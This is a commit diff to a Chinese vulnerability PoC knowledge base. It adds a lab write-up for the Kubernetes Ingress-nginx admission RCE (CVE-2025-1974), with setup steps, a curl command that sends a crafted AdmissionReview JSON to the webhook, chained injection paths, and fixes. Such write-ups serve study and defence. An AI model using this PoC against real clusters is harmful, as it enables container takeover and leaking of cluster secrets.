update

2025-11-05 02:37:58 +00:00 · 2025-04-14 15:17:52 +08:00 · 2025-04-14 15:17:52 +08:00 · 4d4bccfbfb
commit 4d4bccfbfb
parent 95162cea88
11 changed files with 189 additions and 3 deletions
--- a/README.md
+++ b/README.md
@ -1,6 +1,11 @@
 # Awesome-POC

-##### **【免责声明】本项目所涉及的技术、思路和工具仅供学习，任何人不得将其用于非法用途和盈利，不得将其用于非授权渗透测试，否则后果自行承担，与本项目无关。使用本项目前请先阅读 [法律法规](https://github.com/Threekiii/Awesome-Laws)。**
+**❗【免责声明】本项目所涉及的技术、思路和工具仅供学习，任何人不得将其用于非法用途和盈利，不得将其用于非授权渗透测试，否则后果自行承担，与本项目无关。 使用本项目前请先阅读 [法律法规](https://github.com/Threekiii/Awesome-Laws)。**
+
+_Disclaimer: The technologies, concepts, and tools provided in this Git repository are intended for educational and research purposes only. Any use for illegal activities, unauthorized penetration testing, or commercial purposes is strictly prohibited. Please read the [Awesome-Lows](https://github.com/Threekiii/Awesome-Laws) before using this repository._
+
+
+📖 一个漏洞 PoC 知识库。_A knowledge base for vulnerability PoCs(Proof of Concept),  with 1k+ vulnerabilities._

 ## 0x01 项目导航

@ -733,6 +738,7 @@
  * Docker daemon api 未授权访问漏洞 RCE
  * K8s API Server未授权命令执行
  * K8s etcd未授权访问
+  * Kubernetes Ingress-nginx admission 远程代码执行漏洞 CVE-2025-1974
  * MinIO SSRF 漏洞 CVE-2021-21287
  * Nacos secret.key 默认密钥 未授权访问漏洞
  * Nacos 未授权接口命令执行漏洞 CVE-2021-29442
--- a/Web应用漏洞/Apache
+++ b/Web应用漏洞/Apache
@ -1,4 +1,4 @@
-# Apache HertzBeat SnakeYaml 反序列化远程代码执行漏洞 CVE-2024-42323
+h# Apache HertzBeat SnakeYaml 反序列化远程代码执行漏洞 CVE-2024-42323

 ## 漏洞描述

--- a/云安全漏洞/Kubernetes
+++ b/云安全漏洞/Kubernetes
@ -0,0 +1,176 @@
+# Kubernetes Ingress-nginx admission 远程代码执行漏洞 CVE-2025-1974
+
+## 漏洞描述
+
+Ingress-nginx 是 Kubernetes 集群内服务对外暴露的访问接入点，用于承载集群内服务访问流量。其小于 1.12.1 的旧版本中，Kubernetes Ingress-nginx admission 控制器存在一个配置注入漏洞，已获取集群网络访问权限的远程攻击者，可以通过 `ValidatingAdmissionWebhook` 提交一个配置文件进行验证，并在配置文件中插入恶意配置，实现远程代码执行，导致 Ingress-nginx 所在容器被攻击者控制，并可能导致集群内的 Secrets 泄漏。
+
+参考链接：
+
+- https://github.com/kubernetes/kubernetes/issues/131009
+- https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-1974
+- https://github.com/sandumjacob/IngressNightmare-POCs
+	- CVE-2025-24513: [kubernetes/kubernetes#131005](https://github.com/kubernetes/kubernetes/issues/131005)
+	- CVE-2025-24514: [kubernetes/kubernetes#131006](https://github.com/kubernetes/kubernetes/issues/131006)
+	- CVE-2025-1097: [kubernetes/kubernetes#131007](https://github.com/kubernetes/kubernetes/issues/131007)
+	- CVE-2025-1098: [kubernetes/kubernetes#131008](https://github.com/kubernetes/kubernetes/issues/131008)
+	- CVE-2025-1974: [kubernetes/kubernetes#131009](https://github.com/kubernetes/kubernetes/issues/131009)
+- https://www.wiz.io/blog/ingress-nginx-kubernetes-vulnerabilities
+
+## 漏洞影响
+
+```
+Ingress-nginx < v1.11.0
+Ingress-nginx v1.11.0 - 1.11.4
+Ingress-nginx v1.12.0
+```
+
+## 环境搭建
+
+安装 minikube 和 kubectl：
+
+- [minikube](https://minikube.sigs.k8s.io/docs/start/)
+- [kubectl](https://kubernetes.io/docs/reference/kubectl/)
+
+启动 minikube，本环境的 minikube、kubectl、Kubernetes Server 版本如下：
+
+```
+minikube version
+-----
+minikube version: v1.33.1
+commit: 5883c09216182566a63dff4c326a6fc9ed2982ff
+```
+
+```
+kubectl version
+-----
+Client Version: v1.30.1
+Kustomize Version: v5.0.4-0.20230601165947-6ce0bf390ce3
+Server Version: v1.30.0
+```
+
+下载 Kubernetes Ingress-nginx 1.11.3 的 [deploy.yaml](https://github.com/kubernetes/ingress-nginx/blob/f6456ea86c6c330e7cf401ade70ce1faa757265b/deploy/static/provider/cloud/deploy.yaml)，通过 kubectl 部署资源：
+
+```
+kubectl apply -f deploy.yaml
+```
+
+部署完成后，可执行以下命令查看 ingress-nginx 命名空间中的 pod：
+
+```
+kubectl get pods -n ingress-nginx
+-----
+NAME                                        READY   STATUS      RESTARTS   AGE
+ingress-nginx-admission-create-jmw9x        0/1     Completed   0          24m
+ingress-nginx-admission-patch-jbxj6         0/1     Completed   1          24m
+ingress-nginx-controller-869748796c-p4jvj   1/1     Running     0          24m
+```
+
+![](images/Kubernetes%20Ingress-nginx%20admission%20远程代码执行漏洞%20CVE-2025-1974/image-20250413172307109.png)
+
+## 漏洞复现
+
+查看 webhook 服务器信息，显示服务器正在监听 8443 端口：
+
+```
+kubectl describe pod ingress-nginx-controller-869748796c-p4jvj -n ingress-nginx
+-----
+--validating-webhook=:8443
+```
+
+![](images/Kubernetes%20Ingress-nginx%20admission%20远程代码执行漏洞%20CVE-2025-1974/image-20250413172648584.png)
+
+使用端口转发访问 webhook 端口：
+
+```
+kubectl port-forward -n ingress-nginx ingress-nginx-controller-869748796c-p4jvj 1337:8443
+```
+
+![](images/Kubernetes%20Ingress-nginx%20admission%20远程代码执行漏洞%20CVE-2025-1974/image-20250413172813574.png)
+
+此时，我们已将易受攻击的 webhook 服务器从 pod 转发到本地机器的本地端口 1337。执行 [poc](https://github.com/sandumjacob/IngressNightmare-POCs)，发送包含 nginx 配置的 AdmissionRequest：
+
+```
+curl --insecure -v -H "Content-Type: application/json" --data @poc.json https://localhost:1337/fake/path
+```
+
+![](images/Kubernetes%20Ingress-nginx%20admission%20远程代码执行漏洞%20CVE-2025-1974/image-20250413173013506.png)
+
+查看日志，以确保执行成功：
+
+```
+kubectl logs ingress-nginx-controller-869748796c-p4jvj -n ingress-nginx
+```
+
+![](images/Kubernetes%20Ingress-nginx%20admission%20远程代码执行漏洞%20CVE-2025-1974/image-20250413173205563.png)
+
+组合利用：
+
+- CVE-2025-1974 + CVE-2025-24514 → auth-url injection → RCE
+- CVE-2025-1974 + CVE-2025-1097 → auth-tls-match-cn injection → RCE
+- CVE-2025-1974 + CVE-2025-1098→ mirror UID injection → RCE
+
+## 漏洞 POC
+
+poc.json
+
+```json
+{
+  "apiVersion": "admission.k8s.io/v1",
+  "kind": "AdmissionReview",
+  "request": {
+    "kind": {
+      "group": "networking.k8s.io",
+      "version": "v1",
+      "kind": "Ingress"
+    },
+    "resource": {
+      "group": "",
+      "version": "v1",
+      "resource": "namespaces"
+    },
+    "operation": "CREATE",
+    "object": {
+      "metadata": {
+        "name": "deads",
+        "annotations": {
+            "nginx.ingress.kubernetes.io/mirror-host": "test"
+        }
+      },
+      "spec": {
+        "rules": [
+        {
+            "host": "jacobsandum.com",
+            "http": {
+            "paths": [
+                {
+                "path": "/",
+                "pathType": "Prefix",
+                "backend": {
+                    "service": {
+                    "name": "kubernetes",
+                    "port": {
+                        "number": 80
+                    }
+                    }
+                }
+                }
+            ]
+            }
+        }
+        ],
+        "ingressClassName": "nginx"
+      }
+    }
+  }
+}
+```
+
+## 漏洞修复
+
+- 更新至 1.11.5 或 1.12.1 及其以上版本。
+- 确保 admission webhook 端点没有暴露在外。
+
+缓解措施：
+
+- 使用 `controller.admissionWebhooks.enabled=false` 参数重新安装 ingress-nginx；
+- 删除名为 `ingress-nginx-admission` 的 `ValidatingWebhookConfiguration` ，并从 `ingress-nginx-controller` 容器的 Deployment 或 DaemonSet 中删除 `--validating-webhook` 参数。
--- a/云安全漏洞/Nacos
+++ b/云安全漏洞/Nacos
@ -16,8 +16,12 @@ Nacos 是一个设计用于动态服务发现、配置和服务管理的易于

 ## 漏洞影响

+Nacos 未鉴权且使用 Derby 数据库作为内置数据源：
+
 ```
-Nacos未鉴权（Nacos<1.4.1）且使用Derby数据库作为内置数据源
+Nacos < 1.4.1
+Nacos 2.3.2
+Nacos 2.4.0
 ```

 ## 环境搭建
--- a/CVE-2025-1974/image-20250413172307109.png
+++ b/CVE-2025-1974/image-20250413172307109.png
--- a/CVE-2025-1974/image-20250413172648584.png
+++ b/CVE-2025-1974/image-20250413172648584.png
--- a/CVE-2025-1974/image-20250413172813574.png
+++ b/CVE-2025-1974/image-20250413172813574.png
--- a/CVE-2025-1974/image-20250413173013506.png
+++ b/CVE-2025-1974/image-20250413173013506.png
--- a/CVE-2025-1974/image-20250413173205563.png
+++ b/CVE-2025-1974/image-20250413173205563.png
--- a/CVE-2025-1974/image-20250414102201939.png
+++ b/CVE-2025-1974/image-20250414102201939.png
--- a/CVE-2025-1974/image-20250414102237070.png
+++ b/CVE-2025-1974/image-20250414102237070.png